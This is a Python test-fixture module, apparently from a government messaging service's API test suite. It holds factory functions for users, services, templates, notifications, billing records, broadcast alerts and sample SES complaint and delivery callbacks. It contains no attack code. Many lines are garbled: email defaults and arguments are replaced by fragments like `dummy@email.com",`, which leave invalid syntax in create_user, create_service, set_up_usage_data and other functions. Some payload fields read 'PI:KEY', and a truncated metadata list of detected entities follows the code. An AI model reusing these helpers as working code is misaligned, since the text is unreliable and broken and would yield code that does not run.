from app.dao.inbound_sms_dao import dao_create_inbound_sms
from app.dao.invited_org_user_dao import save_invited_org_user
from app.dao.invited_user_dao import save_invited_user
from app.dao.jobs_dao import dao_create_job
from app.dao.notifications_dao import dao_create_notification
from app.dao.organisation_dao import (
dao_add_service_to_organisation,
dao_create_organisation,
)
from app.dao.permissions_dao import permission_dao
from app.dao.service_callback_api_dao import save_service_callback_api
from app.dao.service_data_retention_dao import insert_service_data_retention
from app.dao.service_inbound_api_dao import save_service_inbound_api
from app.dao.service_permissions_dao import dao_add_service_permission
from app.dao.service_sms_sender_dao import (
dao_update_service_sms_sender,
update_existing_sms_sender_with_inbound_number,
)
from app.dao.services_dao import dao_add_user_to_service, dao_create_service
from app.dao.templates_dao import dao_create_template, dao_update_template
from app.dao.users_dao import save_model_user
from app.models import (
EMAIL_TYPE,
KEY_TYPE_NORMAL,
LETTER_TYPE,
MOBILE_TYPE,
SMS_TYPE,
AnnualBilling,
ApiKey,
BroadcastEvent,
BroadcastMessage,
BroadcastProvider,
BroadcastProviderMessage,
BroadcastProviderMessageNumber,
BroadcastStatusType,
Complaint,
DailySortedLetter,
Domain,
EmailBranding,
FactBilling,
FactNotificationStatus,
FactProcessingTime,
InboundNumber,
InboundSms,
InvitedOrganisationUser,
InvitedUser,
Job,
LetterBranding,
LetterRate,
Notification,
NotificationHistory,
Organisation,
Permission,
Rate,
ReturnedLetter,
Service,
ServiceCallbackApi,
ServiceContactList,
ServiceEmailReplyTo,
ServiceGuestList,
ServiceInboundApi,
ServiceLetterContact,
ServicePermission,
ServiceSmsSender,
Template,
TemplateFolder,
User,
WebauthnCredential,
)
def create_user(
*,
mobile_number="+447700900986",
dummy@email.com",
state='active',
id_=None,
name="Test User"
):
data = {
'id': id_ or uuid.uuid4(),
'name': name,
'email_address': email,
'password': 'password',
'mobile_number': mobile_number,
'state': state
}
user = User.query.filter_by(email_address=email).first()
if not user:
user = User(**data)
save_model_user(user, validated_email_access=True)
return user
def create_permissions(user, service, *permissions):
permissions = [
Permission(service_id=service.id, user_id=user.id, permission=p)
for p in permissions
]
permission_dao.set_user_service_permission(user, service, permissions, _commit=True)
def create_service(
user=None,
service_name="Sample service",
service_id=None,
restricted=False,
count_as_live=True,
service_permissions=None,
research_mode=False,
active=True,
email_from=None,
prefix_sms=True,
message_limit=1000,
organisation_type='central',
check_if_service_exists=False,
go_live_user=None,
go_live_at=None,
crown=True,
organisation=None,
purchase_order_number=None,
billing_contact_names=None,
billing_contact_email_addresses=None,
billing_reference=None,
):
if check_if_service_exists:
service = Service.query.filter_by(name=service_name).first()
if (not check_if_service_exists) or (check_if_service_exists and not service):
service = Service(
name=service_name,
message_limit=message_limit,
restricted=restricted,
email_from=email_from if email_from else service_name.lower().replace(' ', '.'),
created_by=user if user else create_user(dummy@email.com())),
prefix_sms=prefix_sms,
organisation_type=organisation_type,
organisation=organisation,
go_live_user=go_live_user,
go_live_at=go_live_at,
crown=crown,
purchase_order_number=purchase_order_number,
billing_contact_names=billing_contact_names,
billing_contact_email_addresses=billing_contact_email_addresses,
billing_reference=billing_reference,
)
dao_create_service(
service,
service.created_by,
service_id,
service_permissions=service_permissions,
)
service.active = active
service.research_mode = research_mode
service.count_as_live = count_as_live
else:
if user and user not in service.users:
dao_add_user_to_service(service, user)
return service
def create_service_with_inbound_number(
inbound_number='1234567',
*args, **kwargs
):
service = create_service(*args, **kwargs)
sms_sender = ServiceSmsSender.query.filter_by(service_id=service.id).first()
inbound = create_inbound_number(number=inbound_number, service_id=service.id)
update_existing_sms_sender_with_inbound_number(service_sms_sender=sms_sender,
sms_sender=inbound_number,
inbound_number_id=inbound.id)
return service
def create_service_with_defined_sms_sender(
sms_sender_value='1234567',
*args, **kwargs
):
service = create_service(*args, **kwargs)
sms_sender = ServiceSmsSender.query.filter_by(service_id=service.id).first()
dao_update_service_sms_sender(service_id=service.id,
service_sms_sender_id=sms_sender.id,
is_default=True,
sms_sender=sms_sender_value)
return service
def create_template(
service,
template_type=SMS_TYPE,
template_name=None,
subject='Template subject',
content='Dear Sir/Madam, Hello. Yours Truly, The Government.',
reply_to=None,
hidden=False,
archived=False,
folder=None,
postage=None,
process_type='normal',
contact_block_id=None
):
data = {
'name': template_name or '{} Template Name'.format(template_type),
'template_type': template_type,
'content': content,
'service': service,
'created_by': service.created_by,
'reply_to': reply_to,
'hidden': hidden,
'folder': folder,
'process_type': process_type,
}
if template_type == LETTER_TYPE:
data["postage"] = postage or "second"
if contact_block_id:
data['service_letter_contact_id'] = contact_block_id
if template_type != SMS_TYPE:
data['subject'] = subject
template = Template(**data)
dao_create_template(template)
if archived:
template.archived = archived
dao_update_template(template)
return template
def create_notification(
template=None,
job=None,
job_row_number=None,
to_field=None,
status='created',
reference=None,
created_at=None,
sent_at=None,
updated_at=None,
billable_units=1,
personalisation=None,
api_key=None,
key_type=KEY_TYPE_NORMAL,
sent_by=None,
client_reference=None,
rate_multiplier=None,
international=False,
phone_prefix=None,
scheduled_for=None,
normalised_to=None,
one_off=False,
reply_to_text=None,
created_by_id=None,
postage=None,
document_download_count=None,
):
assert job or template
if job:
template = job.template
if created_at is None:
created_at = datetime.utcnow()
if to_field is None:
to_field = '+447700900855' if template.template_type == SMS_TYPE else dummy@email.com'
if status not in ('created', 'validation-failed', 'virus-scan-failed', 'pending-virus-check'):
sent_at = sent_at or datetime.utcnow()
updated_at = updated_at or datetime.utcnow()
if not one_off and (job is None and api_key is None):
# we did not specify in test - lets create it
api_key = ApiKey.query.filter(ApiKey.service == template.service, ApiKey.key_type == key_type).first()
if not api_key:
api_key = create_api_key(template.service, key_type=key_type)
if template.template_type == 'letter' and postage is None:
postage = 'second'
data = {
'id': uuid.uuid4(),
'to': to_field,
'job_id': job and job.id,
'job': job,
'service_id': template.service.id,
'service': template.service,
'template_id': template.id,
'template_version': template.version,
'status': status,
'reference': reference,
'created_at': created_at,
'sent_at': sent_at,
'billable_units': billable_units,
'personalisation': personalisation,
'notification_type': template.template_type,
'api_key': api_key,
'api_key_id': api_key and api_key.id,
'key_type': api_key.key_type if api_key else key_type,
'sent_by': sent_by,
'updated_at': updated_at,
'client_reference': client_reference,
'job_row_number': job_row_number,
'rate_multiplier': rate_multiplier,
'international': international,
'phone_prefix': phone_prefix,
'normalised_to': normalised_to,
'reply_to_text': reply_to_text,
'created_by_id': created_by_id,
'postage': postage,
'document_download_count': document_download_count,
}
notification = Notification(**data)
dao_create_notification(notification)
return notification
def create_notification_history(
template=None,
job=None,
job_row_number=None,
status='created',
reference=None,
created_at=None,
sent_at=None,
updated_at=None,
billable_units=1,
api_key=None,
key_type=KEY_TYPE_NORMAL,
sent_by=None,
client_reference=None,
rate_multiplier=None,
international=False,
phone_prefix=None,
created_by_id=None,
postage=None,
id=None
):
assert job or template
if job:
template = job.template
if created_at is None:
created_at = datetime.utcnow()
if status != 'created':
sent_at = sent_at or datetime.utcnow()
updated_at = updated_at or datetime.utcnow()
if template.template_type == 'letter' and postage is None:
postage = 'second'
data = {
'id': id or uuid.uuid4(),
'job_id': job and job.id,
'job': job,
'service_id': template.service.id,
'service': template.service,
'template_id': template.id,
'template_version': template.version,
'status': status,
'reference': reference,
'created_at': created_at,
'sent_at': sent_at,
'billable_units': billable_units,
'notification_type': template.template_type,
'api_key': api_key,
'api_key_id': api_key and api_key.id,
'key_type': api_key.key_type if api_key else key_type,
'sent_by': sent_by,
'updated_at': updated_at,
'client_reference': client_reference,
'job_row_number': job_row_number,
'rate_multiplier': rate_multiplier,
'international': international,
'phone_prefix': phone_prefix,
'created_by_id': created_by_id,
'postage': postage
}
notification_history = NotificationHistory(**data)
db.session.add(notification_history)
db.session.commit()
return notification_history
def create_job(
template,
notification_count=1,
created_at=None,
job_status='pending',
scheduled_for=None,
processing_started=None,
processing_finished=None,
original_file_name='some.csv',
archived=False,
contact_list_id=None,
):
data = {
'id': uuid.uuid4(),
'service_id': template.service_id,
'service': template.service,
'template_id': template.id,
'template_version': template.version,
'original_file_name': original_file_name,
'notification_count': notification_count,
'created_at': created_at or datetime.utcnow(),
'created_by': template.created_by,
'job_status': job_status,
'scheduled_for': scheduled_for,
'processing_started': processing_started,
'processing_finished': processing_finished,
'archived': archived,
'contact_list_id': contact_list_id,
}
job = Job(**data)
dao_create_job(job)
return job
def create_service_permission(service_id, permission=EMAIL_TYPE):
dao_add_service_permission(
service_id if service_id else create_service().id, permission)
service_permissions = ServicePermission.query.all()
return service_permissions
def create_inbound_sms(
service,
notify_number=None,
user_number='447700900111',
provider_date=None,
provider_reference=None,
content='Hello',
provider="mmg",
created_at=None
):
if not service.inbound_number:
create_inbound_number(
# create random inbound number
notify_number or '07{:09}'.format(random.randint(0, 1e9 - 1)),
provider=provider,
service_id=service.id
)
inbound = InboundSms(
service=service,
created_at=created_at or datetime.utcnow(),
notify_number=service.get_inbound_number(),
user_number=user_number,
provider_date=provider_date or datetime.utcnow(),
provider_reference=provider_reference or 'foo',
content=content,
provider=provider
)
dao_create_inbound_sms(inbound)
return inbound
def create_service_inbound_api(
service,
url="https://something.com",
bearer_token="some_super_secret",
):
service_inbound_api = ServiceInboundApi(service_id=service.id,
url=url,
bearer_token=bearer_token,
updated_by_id=service.users[0].id
)
save_service_inbound_api(service_inbound_api)
return service_inbound_api
def create_service_callback_api(
service,
url="https://something.com",
bearer_token="some_super_secret",
callback_type="delivery_status"
):
service_callback_api = ServiceCallbackApi(service_id=service.id,
url=url,
bearer_token=bearer_token,
updated_by_id=service.users[0].id,
callback_type=callback_type
)
save_service_callback_api(service_callback_api)
return service_callback_api
def create_email_branding(colour='blue', logo='test_x2.png', name='test_org_1', text='DisplayName'):
data = {
'colour': colour,
'logo': logo,
'name': name,
'text': text,
}
email_branding = EmailBranding(**data)
dao_create_email_branding(email_branding)
return email_branding
def create_rate(start_date, value, notification_type):
rate = Rate(
id=uuid.uuid4(),
valid_from=start_date,
rate=value,
notification_type=notification_type
)
db.session.add(rate)
db.session.commit()
return rate
def create_letter_rate(start_date=None, end_date=None, crown=True, sheet_count=1, rate=0.33, post_class='second'):
if start_date is None:
start_date = datetime(2016, 1, 1)
rate = LetterRate(
id=uuid.uuid4(),
start_date=start_date,
end_date=end_date,
crown=crown,
sheet_count=sheet_count,
rate=rate,
post_class=post_class
)
db.session.add(rate)
db.session.commit()
return rate
def create_api_key(service, key_type=KEY_TYPE_NORMAL, key_name=None):
id_ = uuid.uuid4()
name = key_name if key_name else '{} api key {}'.format(key_type, id_)
api_key = ApiKey(
service=service,
name=name,
created_by=service.created_by,
key_type=key_type,
id=id_,
secret=uuid.uuid4()
)
db.session.add(api_key)
db.session.commit()
return api_key
def create_inbound_number(number, provider='mmg', active=True, service_id=None):
inbound_number = InboundNumber(
id=uuid.uuid4(),
number=number,
provider=provider,
active=active,
service_id=service_id
)
db.session.add(inbound_number)
db.session.commit()
return inbound_number
def create_reply_to_email(
service,
email_address,
is_default=True,
archived=False
):
data = {
'service': service,
'email_address': email_address,
'is_default': is_default,
'archived': archived,
}
reply_to = ServiceEmailReplyTo(**data)
db.session.add(reply_to)
db.session.commit()
return reply_to
def create_service_sms_sender(
service,
sms_sender,
is_default=True,
inbound_number_id=None,
archived=False
):
data = {
'service_id': service.id,
'sms_sender': sms_sender,
'is_default': is_default,
'inbound_number_id': inbound_number_id,
'archived': archived,
}
service_sms_sender = ServiceSmsSender(**data)
db.session.add(service_sms_sender)
db.session.commit()
return service_sms_sender
def create_letter_contact(
service,
contact_block,
is_default=True,
archived=False
):
data = {
'service': service,
'contact_block': contact_block,
'is_default': is_default,
'archived': archived,
}
letter_content = ServiceLetterContact(**data)
db.session.add(letter_content)
db.session.commit()
return letter_content
def create_annual_billing(
service_id, free_sms_fragment_limit, financial_year_start
):
annual_billing = AnnualBilling(
service_id=service_id,
free_sms_fragment_limit=free_sms_fragment_limit,
financial_year_start=financial_year_start
)
db.session.add(annual_billing)
db.session.commit()
return annual_billing
def create_domain(domain, organisation_id):
domain = Domain(domain=domain, organisation_id=organisation_id)
db.session.add(domain)
db.session.commit()
return domain
def create_organisation(
name='test_org_1',
active=True,
organisation_type=None,
domains=None,
organisation_id=None,
purchase_order_number=None,
billing_contact_names=None,
billing_contact_email_addresses=None,
billing_reference=None,
):
data = {
'id': organisation_id,
'name': name,
'active': active,
'organisation_type': organisation_type,
'purchase_order_number': purchase_order_number,
'billing_contact_names': billing_contact_names,
'billing_contact_email_addresses': billing_contact_email_addresses,
'billing_reference': billing_reference,
}
organisation = Organisation(**data)
dao_create_organisation(organisation)
for domain in domains or []:
create_domain(domain, organisation.id)
return organisation
def create_invited_org_user(organisation, invited_by, dummy@email.com'):
invited_org_user = InvitedOrganisationUser(
email_address=email_address,
invited_by=invited_by,
organisation=organisation,
)
save_invited_org_user(invited_org_user)
return invited_org_user
def create_daily_sorted_letter(billing_day=None,
file_name="Notify-20180118123.rs.txt",
unsorted_count=0,
sorted_count=0):
daily_sorted_letter = DailySortedLetter(
billing_day=billing_day or date(2018, 1, 18),
file_name=file_name,
unsorted_count=unsorted_count,
sorted_count=sorted_count
)
db.session.add(daily_sorted_letter)
db.session.commit()
return daily_sorted_letter
def create_ft_billing(bst_date,
template,
*,
provider='test',
rate_multiplier=1,
international=False,
rate=0,
billable_unit=1,
notifications_sent=1,
postage='none'
):
data = FactBilling(bst_date=bst_date,
service_id=template.service_id,
template_id=template.id,
notification_type=template.template_type,
provider=provider,
rate_multiplier=rate_multiplier,
international=international,
rate=rate,
billable_units=billable_unit,
notifications_sent=notifications_sent,
postage=postage)
db.session.add(data)
db.session.commit()
return data
def create_ft_notification_status(
bst_date,
notification_type='sms',
service=None,
template=None,
job=None,
key_type='normal',
notification_status='delivered',
count=1
):
if job:
template = job.template
if template:
service = template.service
notification_type = template.template_type
else:
if not service:
service = create_service()
template = create_template(service=service, template_type=notification_type)
data = FactNotificationStatus(
bst_date=bst_date,
template_id=template.id,
service_id=service.id,
job_id=job.id if job else uuid.UUID(int=0),
notification_type=notification_type,
key_type=key_type,
notification_status=notification_status,
notification_count=count
)
db.session.add(data)
db.session.commit()
return data
def create_process_time(bst_date='2021-03-01', messages_total=35, messages_within_10_secs=34):
data = FactProcessingTime(
bst_date=bst_date,
messages_total=messages_total,
messages_within_10_secs=messages_within_10_secs
)
fact_processing_time_dao.insert_update_processing_time(data)
def create_service_guest_list(service, email_address=None, mobile_number=None):
if email_address:
guest_list_user = ServiceGuestList.from_string(service.id, EMAIL_TYPE, email_address)
elif mobile_number:
guest_list_user = ServiceGuestList.from_string(service.id, MOBILE_TYPE, mobile_number)
else:
guest_list_user = ServiceGuestList.from_string(service.id, EMAIL_TYPE, dummy@email.com')
db.session.add(guest_list_user)
db.session.commit()
return guest_list_user
def create_complaint(service=None,
notification=None,
created_at=None):
if not service:
service = create_service()
if not notification:
template = create_template(service=service, template_type='email')
notification = create_notification(template=template)
complaint = Complaint(notification_id=notification.id,
service_id=service.id,
ses_feedback_id=str(uuid.uuid4()),
complaint_type='abuse',
complaint_date=datetime.utcnow(),
created_at=created_at if created_at else datetime.now()
)
db.session.add(complaint)
db.session.commit()
return complaint
def ses_complaint_callback_malformed_message_id():
return {
'Signature': 'bb',
'SignatureVersion': '1', 'MessageAttributes': {}, 'MessageId': 'PI:KEY',
'UnsubscribeUrl': 'https://sns.eu-west-1.amazonaws.com',
'TopicArn': 'arn:ses_notifications', 'Type': 'Notification',
'Timestamp': '2018-06-05T14:00:15.952Z', 'Subject': None,
'Message': '{"notificationType":"Complaint","complaint":{"complainedRecipients":[{"emailAddress":dummy@email.com"}],"timestamp":"2018-06-05T13:59:58.000Z","feedbackId":"ses_feedback_id"},"mail":{"timestamp":"2018-06-05T14:00:15.950Z","source":"\\"Some Service\\" <someservicenotifications.service.gov.uk>","sourceArn":"arn:identity/notifications.service.gov.uk","sourceIp":"127.0.0.1","sendingAccountId":"888450439860","badMessageId":"ref1","destination":[dummy@email.com"]}}', # noqa
'SigningCertUrl': 'https://sns.pem'
}
def ses_complaint_callback_with_missing_complaint_type():
"""
https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object
"""
return {
'Signature': 'bb',
'SignatureVersion': '1', 'MessageAttributes': {}, 'MessageId': 'PI:KEY',
'UnsubscribeUrl': 'https://sns.eu-west-1.amazonaws.com',
'TopicArn': 'arn:ses_notifications', 'Type': 'Notification',
'Timestamp': '2018-06-05T14:00:15.952Z', 'Subject': None,
'Message': '{"notificationType":"Complaint","complaint":{"complainedRecipients":[{"emailAddress":dummy@email.com"}],"timestamp":"2018-06-05T13:59:58.000Z","feedbackId":"ses_feedback_id"},"mail":{"timestamp":"2018-06-05T14:00:15.950Z","source":"\\"Some Service\\" <someservicenotifications.service.gov.uk>","sourceArn":"arn:identity/notifications.service.gov.uk","sourceIp":"127.0.0.1","sendingAccountId":"888450439860","messageId":"ref1","destination":[dummy@email.com"]}}', # noqa
'SigningCertUrl': 'https://sns.pem'
}
def ses_complaint_callback():
"""
https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object
"""
return {
'Signature': 'bb',
'SignatureVersion': '1', 'MessageAttributes': {}, 'MessageId': 'PI:KEY',
'UnsubscribeUrl': 'https://sns.eu-west-1.amazonaws.com',
'TopicArn': 'arn:ses_notifications', 'Type': 'Notification',
'Timestamp': '2018-06-05T14:00:15.952Z', 'Subject': None,
'Message': '{"notificationType":"Complaint","complaint":{"complaintFeedbackType": "abuse", "complainedRecipients":[{"emailAddress":dummy@email.com"}],"timestamp":"2018-06-05T13:59:58.000Z","feedbackId":"ses_feedback_id"},"mail":{"timestamp":"2018-06-05T14:00:15.950Z","source":"\\"Some Service\\" <someservicenotifications.service.gov.uk>","sourceArn":"arn:identity/notifications.service.gov.uk","sourceIp":"127.0.0.1","sendingAccountId":"888450439860","messageId":"ref1","destination":[dummy@email.com"]}}', # noqa
'SigningCertUrl': 'https://sns.pem'
}
def ses_notification_callback():
return '{\n "Type" : "Notification",\n "MessageId" : "ref1",' \
'\n "TopicArn" : "arn:aws:sns:eu-west-1:123456789012:testing",' \
'\n "Message" : "{\\"notificationType\\":\\"Delivery\\",' \
'\\"mail\\":{\\"timestamp\\":\\"2016-03-14T12:35:25.909Z\\",' \
'\\"source\\":dummy@email.com",' \
'\\"sourceArn\\":\\"arn:aws:ses:eu-west-1:123456789012:identity/testing-notify\\",' \
'\\"sendingAccountId\\":\\"123456789012\\",' \
'\\"messageId\\":\\"ref1\\",' \
'\\"destination\\":dummy@email.com"]},' \
'\\"delivery\\":{\\"timestamp\\":\\"2016-03-14T12:35:26.567Z\\",' \
'\\"processingTimeMillis\\":658,' \
'\\"recipients\\":dummy@email.com"],' \
'\\"smtpResponse\\":\\"250 2.0.0 OK 1457958926 uo5si26480932wjc.221 - gsmtp\\",' \
'\\"reportingMTA\\":\\"a6-238.smtp-out.eu-west-1.amazonses.com\\"}}",' \
'\n "Timestamp" : "2016-03-14T12:35:26.665Z",\n "SignatureVersion" : "1",' \
'\n "Signature" : "X8d7eTAOZ6wlnrdVVPYanrAlsX0SMPfOzhoTEBnQqYkrNWTqQY91C0f3bxtPdUhUt' \
'PI:KEY' \
'PI:KEY' \
'PI:KEY",' \
'\n "SigningCertURL" : "https://sns.eu-west-1.amazonaws.com/SimpleNotificationService-bb750' \
'dd426d95ee9390147a5624348ee.pem",' \
'\n "UnsubscribeURL" : "https://sns.eu-west-1.amazonaws.com/?Action=Unsubscribe&S' \
'PI:KEY"\n}'
def create_service_data_retention(
service,
notification_type='sms',
days_of_retention=3
):
data_retention = insert_service_data_retention(
service_id=service.id,
notification_type=notification_type,
days_of_retention=days_of_retention
)
return data_retention
def create_invited_user(service=None,
to_email_address=None):
if service is None:
service = create_service()
if to_email_address is None:
to_email_address = dummy@email.com'
from_user = service.users[0]
data = {
'service': service,
'email_address': to_email_address,
'from_user': from_user,
'permissions': 'send_messages,manage_service,manage_api_keys',
'folder_permissions': [str(uuid.uuid4()), str(uuid.uuid4())]
}
invited_user = InvitedUser(**data)
save_invited_user(invited_user)
return invited_user
def create_template_folder(service, name='foo', parent=None):
tf = TemplateFolder(name=name, service=service, parent=parent)
db.session.add(tf)
db.session.commit()
return tf
def create_letter_branding(name='HM Government', filename='hm-government'):
test_domain_branding = LetterBranding(name=name,
filename=filename,
)
db.session.add(test_domain_branding)
db.session.commit()
return test_domain_branding
def set_up_usage_data(start_date):
year = int(start_date.strftime('%Y'))
one_week_earlier = start_date - timedelta(days=7)
two_days_later = start_date + timedelta(days=2)
one_week_later = start_date + timedelta(days=7)
one_month_later = start_date + timedelta(days=31)
# service with sms and letters:
service_1_sms_and_letter = create_service(
service_name='a - with sms and letter',
purchase_order_number="service purchase order number",
billing_contact_names="service billing contact names",
dummy@email.com dummy@email.com",
billing_reference="service billing reference"
)
letter_template_1 = create_template(service=service_1_sms_and_letter, template_type='letter')
sms_template_1 = create_template(service=service_1_sms_and_letter, template_type='sms')
create_annual_billing(
service_id=service_1_sms_and_letter.id, free_sms_fragment_limit=10, financial_year_start=year
)
org_1 = create_organisation(
name="Org for {}".format(service_1_sms_and_letter.name),
purchase_order_number="org1 purchase order number",
billing_contact_names="org1 billing contact names",
dummy@email.com dummy@email.com",
billing_reference="org1 billing reference"
)
dao_add_service_to_organisation(
service=service_1_sms_and_letter,
organisation_id=org_1.id
)
create_ft_billing(bst_date=one_week_earlier, template=sms_template_1, billable_unit=2, rate=0.11)
create_ft_billing(bst_date=start_date, template=sms_template_1, billable_unit=2, rate=0.11)
create_ft_billing(bst_date=two_days_later, template=sms_template_1, billable_unit=1, rate=0.11)
create_ft_billing(bst_date=one_week_later, template=letter_template_1,
notifications_sent=2, billable_unit=1, rate=.35, postage='first')
create_ft_billing(bst_date=one_month_later, template=letter_template_1,
notifications_sent=4, billable_unit=2, rate=.45, postage='second')
create_ft_billing(bst_date=one_week_later, template=letter_template_1,
notifications_sent=2, billable_unit=2, rate=.45, postage='second')
# service with emails only:
service_with_emails = create_service(service_name='b - emails')
email_template = create_template(service=service_with_emails, template_type='email')
org_2 = create_organisation(
name='Org for {}'.format(service_with_emails.name),
)
dao_add_service_to_organisation(service=service_with_emails, organisation_id=org_2.id)
create_ft_billing(bst_date=start_date, template=email_template, notifications_sent=10)
# service with letters:
service_with_letters = create_service(service_name='c - letters only')
letter_template_3 = create_template(service=service_with_letters, template_type='letter')
org_for_service_with_letters = create_organisation(
name="Org for {}".format(service_with_letters.name),
purchase_order_number="org3 purchase order number",
billing_contact_names="org3 billing contact names",
dummy@email.com dummy@email.com",
billing_reference="org3 billing reference"
)
dao_add_service_to_organisation(service=service_with_letters, organisation_id=org_for_service_with_letters.id)
create_ft_billing(bst_date=start_date, template=letter_template_3,
notifications_sent=2, billable_unit=3, rate=.50, postage='first')
create_ft_billing(bst_date=one_week_later, template=letter_template_3,
notifications_sent=8, billable_unit=5, rate=.65, postage='second')
create_ft_billing(bst_date=one_month_later, template=letter_template_3,
notifications_sent=12, billable_unit=5, rate=.65, postage='second')
# service with letters, without an organisation:
service_with_letters_without_org = create_service(service_name='d - service without org')
letter_template_4 = create_template(service=service_with_letters_without_org, template_type='letter')
create_ft_billing(bst_date=two_days_later, template=letter_template_4,
notifications_sent=7, billable_unit=4, rate=1.55, postage='rest-of-world')
create_ft_billing(bst_date=two_days_later, template=letter_template_4,
notifications_sent=8, billable_unit=4, rate=1.55, postage='europe')
create_ft_billing(bst_date=two_days_later, template=letter_template_4,
notifications_sent=2, billable_unit=1, rate=.35, postage='second')
create_ft_billing(bst_date=two_days_later, template=letter_template_4,
notifications_sent=1, billable_unit=1, rate=.50, postage='first')
# service with chargeable SMS, without an organisation
service_with_sms_without_org = create_service(
service_name='b - chargeable sms',
purchase_order_number="sms purchase order number",
billing_contact_names="sms billing contact names",
dummy@email.com dummy@email.com",
billing_reference="sms billing reference"
)
sms_template = create_template(service=service_with_sms_without_org, template_type='sms')
create_annual_billing(
service_id=service_with_sms_without_org.id, free_sms_fragment_limit=10, financial_year_start=year
)
create_ft_billing(bst_date=one_week_earlier, template=sms_template, rate=0.11, billable_unit=12)
create_ft_billing(bst_date=two_days_later, template=sms_template, rate=0.11)
create_ft_billing(bst_date=one_week_later, template=sms_template, billable_unit=2, rate=0.11)
# service with SMS within free allowance
service_with_sms_within_allowance = create_service(
service_name='e - sms within allowance'
)
sms_template_2 = create_template(service=service_with_sms_within_allowance, template_type='sms')
create_annual_billing(
service_id=service_with_sms_within_allowance.id, free_sms_fragment_limit=10, financial_year_start=year
)
create_ft_billing(bst_date=one_week_later, template=sms_template_2, billable_unit=2, rate=0.11)
# dictionary with services and orgs to return
return {
"org_1": org_1,
"service_1_sms_and_letter": service_1_sms_and_letter,
"org_2": org_2,
"service_with_emails": service_with_emails,
"org_for_service_with_letters": org_for_service_with_letters,
"service_with_letters": service_with_letters,
"service_with_letters_without_org": service_with_letters_without_org,
"service_with_sms_without_org": service_with_sms_without_org,
"service_with_sms_within_allowance": service_with_sms_within_allowance,
}
def create_returned_letter(service=None, reported_at=None, notification_id=None):
if not service:
service = create_service(service_name='a - with sms and letter')
returned_letter = ReturnedLetter(
service_id=service.id,
reported_at=reported_at or datetime.utcnow(),
notification_id=notification_id or uuid.uuid4(),
created_at=datetime.utcnow(),
)
db.session.add(returned_letter)
db.session.commit()
return returned_letter
def create_service_contact_list(
service=None,
original_file_name='EmergencyContactList.xls',
row_count=100,
template_type='email',
created_by_id=None,
archived=False,
):
if not service:
service = create_service(service_name='service for contact list', user=create_user())
contact_list = ServiceContactList(
service_id=service.id,
original_file_name=original_file_name,
row_count=row_count,
template_type=template_type,
created_by_id=created_by_id or service.users[0].id,
created_at=datetime.utcnow(),
archived=archived,
)
db.session.add(contact_list)
db.session.commit()
return contact_list
def create_broadcast_message(
template=None,
*,
service=None, # only used if template is not provided
created_by=None,
personalisation=None,
content=None,
status=BroadcastStatusType.DRAFT,
starts_at=None,
finishes_at=None,
areas=None,
stubbed=False
):
if template:
service = template.service
template_id = template.id
template_version = template.version
personalisation = personalisation or {}
content = template._as_utils_template_with_personalisation(
personalisation
).content_with_placeholders_filled_in
elif content:
template_id = None
template_version = None
personalisation = None
content = content
else:
pytest.fail('Provide template or content')
broadcast_message = BroadcastMessage(
service_id=service.id,
template_id=template_id,
template_version=template_version,
personalisation=personalisation,
status=status,
starts_at=starts_at,
finishes_at=finishes_at,
created_by_id=created_by.id if created_by else service.created_by_id,
areas=areas or {'areas': [], 'simple_polygons': []},
content=content,
stubbed=stubbed
)
db.session.add(broadcast_message)
db.session.commit()
return broadcast_message
def create_broadcast_event(
broadcast_message,
sent_at=None,
message_type='alert',
transmitted_content=None,
transmitted_areas=None,
transmitted_sender=None,
transmitted_starts_at=None,
transmitted_finishes_at=None,
):
b_e = BroadcastEvent(
service=broadcast_message.service,
broadcast_message=broadcast_message,
sent_at=sent_at or datetime.utcnow(),
message_type=message_type,
transmitted_content=transmitted_content or {'body': 'this is an emergency broadcast message'},
transmitted_areas=transmitted_areas or broadcast_message.areas,
transmitted_sender=transmitted_sender or 'www.notifications.service.gov.uk',
transmitted_starts_at=transmitted_starts_at,
transmitted_finishes_at=transmitted_finishes_at or datetime.utcnow() + timedelta(hours=24),
)
db.session.add(b_e)
db.session.commit()
return b_e
def create_broadcast_provider_message(
broadcast_event,
provider,
status='sending'
):
broadcast_provider_message_id = uuid.uuid4()
provider_message = BroadcastProviderMessage(
id=broadcast_provider_message_id,
broadcast_event=broadcast_event,
provider=provider,
status=status,
)
db.session.add(provider_message)
db.session.commit()
provider_message_number = None
if provider == BroadcastProvider.VODAFONE:
provider_message_number = BroadcastProviderMessageNumber(
broadcast_provider_message_id=broadcast_provider_message_id)
db.session.add(provider_message_number)
db.session.commit()
return provider_message
def create_webauthn_credential(
user,
name='my key',
*,
credential_data='ABC123',
registration_response='DEF456',
):
webauthn_credential = WebauthnCredential(
user=user,
name=name,
credential_data=credential_data,
registration_response=registration_response
)
db.session.add(webauthn_credential)
db.session.commit()
return webauthn_credential
| 41,713 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['MEDICAL_LICENSE', 'ee9390147'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2021-03-01'], ['URL', 'https://sns.eu-west-1.amazonaws.com'], ['URL', 'https://sns.pe'], ['URL', 'https://sns.eu-west-1.amazonaws.com'], ['URL', 'https://sns.pe'], ['URL', 'https://sns.eu-west-1.amazonaws.com'], ['URL', 'https://sns.pe'], ['URL', "https://sns.eu-west-1.amazonaws.com/SimpleNotificationService-bb750'"], ['URL', "https://sns.eu-west-1.amazonaws.com/?Action=Unsubscribe&S'"], ['DATE_TIME', 